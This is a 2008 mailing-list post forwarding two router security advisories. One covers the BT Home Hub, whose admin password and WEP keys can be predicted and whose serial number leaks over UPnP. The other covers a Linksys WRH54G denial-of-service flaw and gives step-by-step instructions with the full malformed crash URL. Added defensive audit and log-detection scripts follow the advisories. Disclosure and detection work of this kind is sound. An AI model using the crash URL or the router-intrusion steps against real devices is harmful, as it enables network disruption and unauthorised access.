[guru] Security flaws in network devices
DATE: Thu, 12 Jun 2008 11:05:53 +0200
Another security flaw has been found in the BT Home Hub. The device's default password,
as well as its WEP and WPA keys, are based on its serial number, which can also be
obtained easily via UPnP.
A DoS flaw has been found in the http service of Cisco Linksys WRH54G wlan routers.
--- Begin Message ---
UPDATED:
The BT Home Hub's serial number - which is the default admin password
- can also be found on UPnP description XML files. Note that no
password is required to access such files, as they're used for UPnP
(authentication-less) operations. Note: UPnP is enabled by default on
the BT Home Hub.
More information can be found on:
http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub-pt-2/
On Wed, May 21, 2008 at 10:43 PM, Adrian Pastor <ap@gnucitizen.org> wrote:
> http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub/
>
> We're back with more security attacks against the BT Home Hub (most
> popular wireless DSL router in the UK)!
>
> BT added a new security feature on the latest version [1] of the BT
> Home Hub firmware (6.2.6.E at time of writing) which changes the
> default admin password from 'admin' to the serial number of the
> router. From BT Support and Advice [2] site:
>
> "Firmware 6.2.6.E introduces the following improvements: Change
> default Hub Manager access password from 'admin' to your unique Hub
> serial number"
>
> Well, it turns out that you can get the serial number of the Home Hub
> by simply sending a Multi Directory Access Protocol (MDAP) multicast
> request in the network where BT Home Hub is located. Yes, you must
> already be part of the LAN where the Home Hub is present, either via
> ethernet or via Wi-Fi. However, at GNUCITIZEN, we have demonstrated
> [3] trivial ways to predict the WEP encryption key of the Home Hub if
> you know what you are doing.
>
> In summary, there are two ways to break into a BT Home Hub Wi-Fi network:
>
> - arp replays injection plus weak IVs cracking. This attack is
> typically launched using airodump-ng + aireplay-ng + aircrack-ng (I
> highly recommend using Backtrack 2 plus the Alfa USB AWUS036S Wi-Fi
> adaptor for this attack)
> - Predict the Home Hub's default WEP key by bruteforcing a list of
> potential candidates which are derived from the SSID (the SSID can be
> obtained by anyone of course)
>
> As promised in CONFidence [4], we're releasing the full details
> including PoC scripts:
> http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub/
>
> In summary, there are currently about 3 million BT Home Hub routers in
> the UK whose default WEP key AND admin password can be easily
> predicted.
>
>
> ABOUT GNUCITIZEN
>
> GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think
> Tank, which primarily deals with all aspects of the art of hacking.
> Our work has been featured in established magazines and information
> portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and
> many others. The members of the GNUCITIZEN group are well known and
> well established experts in the Information Security, Black Public
> Relations (PR) Industries and Hacker Circles with widely recognized
> experience in the government and corporate sectors and the open source
> community.
>
>
> REFERENCES
>
> [1] "What is the latest version of BT Home Hub firmware?"
> http://snipurl.com/29w9o
>
> [2] "What changes are included in the latest BT Home Hub firmware?"
> http://snipurl.com/29oo4
>
> [3] "Default key algorithm in Thomson and BT Home Hub routers"
> http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
>
> [4] "Cracking into embedded devices and beyond! - CONFidence, Krakow 2008"
> http://www.gnucitizen.org/projects/confidence-2008/Cracking%20into%20embedded%20devices%20-%20CONFidence%202K8.pdf
>
--
Adrian 'pagvac' Pastor | Security Consultant and White Hat Hacker | GNUCITIZEN
gnucitizen.com
--- End Message ---
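As an added defender-side check, not part of the original posting: a small audit that parses a UPnP device description document and reports identifiers that, per the advisory above, double as the default admin password. The XML is a constructed sample in the UPnP Device Architecture 1.0 layout with placeholder values; the field list and severities are assumptions for this example.

```python
# Added audit example (not part of the original posting): parse a UPnP
# device description document and report identifiers that the BT Home Hub
# advisory says double as the default admin password. The XML below is a
# constructed sample in the UPnP Device Architecture 1.0 layout; the field
# values are placeholders, not a real device's data.
import xml.etree.ElementTree as ET

UPNP_NS = "urn:schemas-upnp-org:device-1-0"

# Fields whose disclosure matters because they may be reused as credentials
# or as seeds for keys (serialNumber is the one the advisory describes).
SENSITIVE_FIELDS = ("serialNumber", "UDN", "modelNumber")

SAMPLE_DESCRIPTION = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <specVersion><major>1</major><minor>0</minor></specVersion>
  <device>
    <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
    <friendlyName>Example Home Gateway</friendlyName>
    <manufacturer>EXAMPLE-VENDOR</manufacturer>
    <modelName>EXAMPLE-MODEL</modelName>
    <serialNumber>PLACEHOLDER-SERIAL-0000</serialNumber>
    <UDN>uuid:00000000-0000-0000-0000-000000000000</UDN>
  </device>
</root>"""


def exposed_identifiers(description_xml: str) -> dict:
    """Return {field: value} for every sensitive field present in the
    root <device> element of a UPnP description document."""
    root = ET.fromstring(description_xml)
    device = root.find(f"{{{UPNP_NS}}}device")
    if device is None:
        return {}
    found = {}
    for field in SENSITIVE_FIELDS:
        node = device.find(f"{{{UPNP_NS}}}{field}")
        if node is not None and node.text and node.text.strip():
            found[field] = node.text.strip()
    return found


def audit(description_xml: str) -> list:
    """Produce findings; an exposed serial number is the case the advisory
    warns about, since on the Home Hub it is the default admin password."""
    findings = []
    for field, value in exposed_identifiers(description_xml).items():
        severity = "HIGH" if field == "serialNumber" else "INFO"
        findings.append(f"{severity}: unauthenticated UPnP description exposes {field}={value}")
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_DESCRIPTION):
        print(line)
```

Run it against the description document your own gateway serves to see which identifiers it hands out without authentication.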
--- Begin Message ---
1. DESCRIPTION
There is a DoS vulnerability in the Cisco Linksys router WRH54G http service. Any anonymous attacker could crash the http service easily by sending a malformed http request, and does not need any privilege.
When the device attempts to process the malformed request, it will be possible to corrupt sensitive memory. Although unconfirmed, it may also be possible to modify various configuration settings or execute malicious code.
After being attacked, the Cisco Linksys router can't be accessed remotely by any user. The http service does not recover and the attacked router cannot be managed without a hard reboot. A reboot of the router may cause network disconnection.
Furthermore, the firewall can still route packets.
2. Affected products and versions
Affected products:
Cisco Linksys WRH54G and other devices
(Because I don't have enough other Linksys routers in hand, I can't be sure how many devices this vulnerability can affect.)
Affected versions:
The latest firmware v1.01.03
Is any privilege needed:
No
3. ANALYSIS
A malformed http request can cause the http service to crash. The malformed request mixes the string ./ with an overly long run of characters. Its format is as follows:
Http://192.168.1.1/./front_page......front_page.asp
4. EXPLOIT STEPS
4.1 Make sure the router is running normally, and the Web server is working.
4.2 Open the web browser, type the following malformed URL, and press ENTER:
http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page.asp
4.3 Check the http service; it no longer works.
Note:
1. The string ./ in the malformed request is necessary. Without this string, the http server will ask the anonymous user to input auth information.
2. The string .asp at the end of the malformed request is also necessary. Without this string, we cannot crash the http server.
3. The firmware information could be found at: http://www-cn.linksys.com/servlet/Satellite?childpagename=CN%2FLayout&packedargs=page%3D2%26cid%3D1140648553423%26c%3DL_Content_C1&pagename=Linksys%2FCommon%2FVisitorWrapper&SubmittedElement=Linksys%2FFormSubmit%2FProductDownloadSearch&sp_prodsku=1172713275887
4. There is another DoS vulnerability involving malformed http requests in Linksys devices (http://www.securityfocus.com/bid/6301/info).
The description and exploit are different from this vulnerability.
--- End Message ---
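As an added detection example, not part of the original advisory: a scanner that flags access-log entries shaped like the malformed request described above (a "/./" segment followed by an overly long path ending in ".asp"), assuming Common Log Format lines captured by a proxy or sensor in front of the device. The log lines, addresses and the length threshold are constructed for this example.

```python
# Added detection example (not part of the original advisory): scan web
# access-log lines for requests shaped like the malformed URL described in
# the Linksys WRH54G report, i.e. a "/./" segment followed by an overly long
# path ending in ".asp". The log lines are constructed samples in Common Log
# Format; the client addresses are placeholders.
import re
from typing import Optional
from urllib.parse import unquote

CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')

# Threshold is an assumption chosen for this example: a real admin page path
# on the device is a few dozen characters, not hundreds.
LONG_PATH = 200

SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2008:10:01:02 +0200] "GET /index.asp HTTP/1.1" 401 0
10.0.0.5 - - [12/Jun/2008:10:01:09 +0200] "GET /./front_page.asp HTTP/1.1" 200 512
10.0.0.9 - - [12/Jun/2008:10:02:30 +0200] "GET /./""" + "front_page" * 40 + """.asp HTTP/1.1" 200 0
10.0.0.7 - - [12/Jun/2008:10:03:00 +0200] "GET /%2e/index.asp HTTP/1.1" 200 0
"""


def classify(path: str) -> Optional[str]:
    """Return a finding label for a request path, or None if benign."""
    p = unquote(path).split("?", 1)[0]      # normalise %2e and drop the query
    if "/./" not in p:
        return None
    if len(p) > LONG_PATH and p.endswith(".asp"):
        return "crash-pattern"                # long ./...asp as in the advisory
    return "dot-segment"                      # ./ alone: the auth-prompt bypass shape


def scan(log_text: str) -> list:
    """Return (client, decoded path length, label) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        label = classify(path)
        if label:
            hits.append((client, len(unquote(path)), label))
    return hits


if __name__ == "__main__":
    for client, length, label in scan(SAMPLE_LOG):
        print(f"{label:14} from {client} (path length {length})")
```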